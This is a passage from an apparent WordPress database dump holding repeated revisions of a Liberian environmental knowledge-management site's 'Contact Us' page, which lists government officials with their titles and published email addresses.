</p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:32:57','2021-01-22 10:32:57','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3401,42,'2021-01-22 10:33:41','2021-01-22 10:33:41','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\n<p>Conservation Manager </br> FDA </br>\n<a href=\"mailto:blamahg@gmail.com\">blamag@gmail.com</a> </br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:33:41','2021-01-22 10:33:41','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3402,42,'2021-01-22 10:33:41','2021-01-22 10:33:41','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><strong>Blamah Goll</strong>\n<p>Conservation Manager </br> FDA </br>\n<a href=\"mailto:blamahg@gmail.com\">blamag@gmail.com</a> </br>\n<a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kumeh-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Anthony Yokie</strong><br />Manager, NaFAA<br />Department of Marine Fisheries and Environment</p><p><strong>Tonia Boah </strong><br />NaFAA<br />Monitoring, Control, and Surveillance Field Officer </p><p><strong>Joyce Kumeh</strong><br />NaFAA<br />Small Scale Fisheries Officer</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/lavalah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Atty. Stephen B. Lavalah </strong><br />Associate Director, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Nadine Ajamia</strong><br />Policy Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Henry Y. Kesselly</strong><br />Senior Research Officer, LIMA<br />Department of Marine Environmental Protection</p><p><strong>Konah Kaliku</strong><br />Environmental Inspector, LIMA<br />Department of Marine Environmental Protection</p>','Contact Us','','inherit','closed','closed','','80-revision-v1','','','2021-01-22 10:33:41','2021-01-22 10:33:41','',80,'https://ekmsliberia.info/80-revision-v1/',0,'revision','',0),(3403,42,'2021-01-22 10:33:42','2021-01-22 10:33:42','<h2>Contact Us</h2>		\n		<p>Please contact the EKMS Team for further information relating to this website.<br>\nSend an e-mail to our <a href=\"maito:contact@ekmsliberia.info\">Helpdesk</a> or fill out the contact form below:</p>		\n		[everest_form id=\"2889\"]		\n			<h1>EKMS Knowledge Brokers</h1>		\n		Contact  our knowledge brokers for direct support or response to your questions:		\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/j-s-datuama-cammue/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_DC-ogr8olp8eryod9ga98001cuvygjwk7qhl61qfq8npc.jpg\" title=\"JS Datuama Cammue\" alt=\"JS Datuama Cammue\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/benjamin-karmorh/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_BK-ogrsfjwnmn77rir9t18igg8yz6dbin5po1luv23vgg.jpg\" title=\"Benjamin Karmorh\" alt=\"Benjamin Karmorh\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/berexford-s-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/jallah-p1ju3bzfabi6mcpsvtddrmtn0n2x8p1l41iz3ukef4.png\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<p><strong>J.S. Datuama Cammue</strong><br />MEAs Officer/UNCBD Focal Point<br />jcammue@epa.gov.lr</p><p><strong>Benjamin Karmorh</strong><br />MEAs Coordinator/UNFCCC Focal Point<br />bkarmorh@epa.gov.lr</p><p><strong>Berexford S. Jallah</strong><br />GIS Coordinator/UNCCD Focal Point<br />bjallah@epa.gov.lr</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/so.jpg 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/so-300x279.jpg 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/john-k-jallah/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/knowledge_broker_JJ-ogrssuci9be5x1gb7a1m7lilcav5ckx35to04wehhc.jpg\" title=\"John K. Jallah\" alt=\"John K. Jallah\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n							<figure>\n											<a href=\"https://ekmsliberia.info/knowledge-broker/kawusu-toure/\" target=\"_blank\" rel=\"noopener noreferrer\">\n							<img src=\"https://ekmsliberia.info/wp-content/uploads/elementor/thumbs/carlon-p1qhubgxyuo9e7q7zlulymuowu1u7fgj3gecl5bg8w.jpg\" title=\"\" alt=\"\" />								</a>\n											<figcaption></figcaption>\n										</figure>\n		<strong>Jeremiah Sokan Sr.</strong>\n<p>Coordinator Climate Change Secretariat </br>\nEPA </br>\n<a href=\"mailto:jsokan@epa.gov.lr\">jsokan@epa.gov.lr</a><strong>John K. Jallah</strong>\n<p>Manager, ESIA </br>\nDepartment of Compliance and Enforcement </br>\nEPA<p><strong>Daoda S. Carlon </strong><br />Assistant Manager, ESIA<br />Department of Compliance and Enforcement<br />EPA<br /><a href=\"&quot;mailto:carlonbaindu@gmail.com\">carlonbaindu@gmail.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/kn.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/kn-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/edward.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/edward-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<strong>Konikay Nimely</strong>\n<p>EIA Manager </br>FDA </br>\n<a href=\"mailto:kondema79@gmail.com\">kondema79@gmail.com</a><strong>Edward S. Kamara</strong>\n<p>Marketing and Forest Forecast \n</br>\n<a href=\"mailto:kamara.ed14@gmail.com\">kamara.ed14@gmail.com</a><p><strong>Blamah Goll</strong><br />Conservation Manager FDA<br /><a href=\"mailto:blamahg@gmail.com\">blamahg@gmail.com</a><br /><a href=\"mailto:blamahg@yahoo.com\">blamahg@yahoo.com</a></p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/francis-2-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/Uriah-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Francis W. Mwah</strong></p><p>Director, MOA</p><p><a href=\"mailto:fwmwah1958@yahoo.com\">fwmwah1958@yahoo.com</a></p><strong>John Willabo Johnson </strong><br>\nAssistant Minister, MME<br>\n<a href=\"mailto:john.willabo@yahoo.com\">john.willabo@yahoo.com</a><p><strong>Uriah Garsinii </strong><br />Land Use Management Manager, LLA<br /><a href=\"mailto:ugarsinii@yahoo.com\">ugarsinii@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/mr-wesseh.png\" title=\"\" alt=\"\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/WIN_20160609_11_17_46_Pro.jpg\" title=\"WIN_20160609_11_17_46_Pro\" alt=\"WIN_20160609_11_17_46_Pro\" />											\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/AlFreeman.jpg\" title=\"\" alt=\"\" />											\n		<strong>Aaron S.M. Wesseh</strong><br>\nManager, CCCD Project<br>\n<a href=\"mailto:bethelapril90@gmail.com\">bethelapril90@gmail.com</a><p><strong>Jesse Mathies</strong><br />Assistant Director, MOCI<br />Division of Foreign Trade<br /><a href=\"mailto:jesmathies@gmail.com\">jesmathies@gmail.com</a></p><p><strong>Alphonso Freeman</strong><br />Biosafety Officer, MOCI<br />National Standard Laboratory<br /><a href=\"mailto:freemanalphonso29@yahoo.com\">freemanalphonso29@yahoo.com</a></p>		\n										<img src=\"https://ekmsliberia.info/wp-content/uploads/2020/10/1.jpg\" title=\"\" alt=\"\" />											\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/golafale.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/golafale-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n		<p><strong>Lasana M. Donzo</strong><br />Coordinator for Standards, MOCI<br />Bureau of Industrial Services<br /><a href=\"mailto:lasanadonzo@yahoo.com\">lasanadonzo@yahoo.com</a></p><p><strong>Mambu Golafale</strong><br />Senior Research Officer, MOCI<br />Division of Knowledge Management &amp; Archive<br /><a href=\"mailto:mgolafale1@gmail.com\">mgolafale1@gmail.com</a></p><p><strong>Ahmed Sheriff </strong><br />Director, NaFAA<br />Department of Marine Fisheries and Environment</p>		\n										<img width=\"700\" height=\"652\" src=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png\" alt=\"\" loading=\"lazy\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2021/01/yokie.png 700w, https://ekmsliberia.info/wp-content/uploads/2021/01/yokie-300x279.png 300w\" sizes=\"(max-width: 700px) 100vw, 700px\" />											\n										<img width=\"700\" height=\"652\" 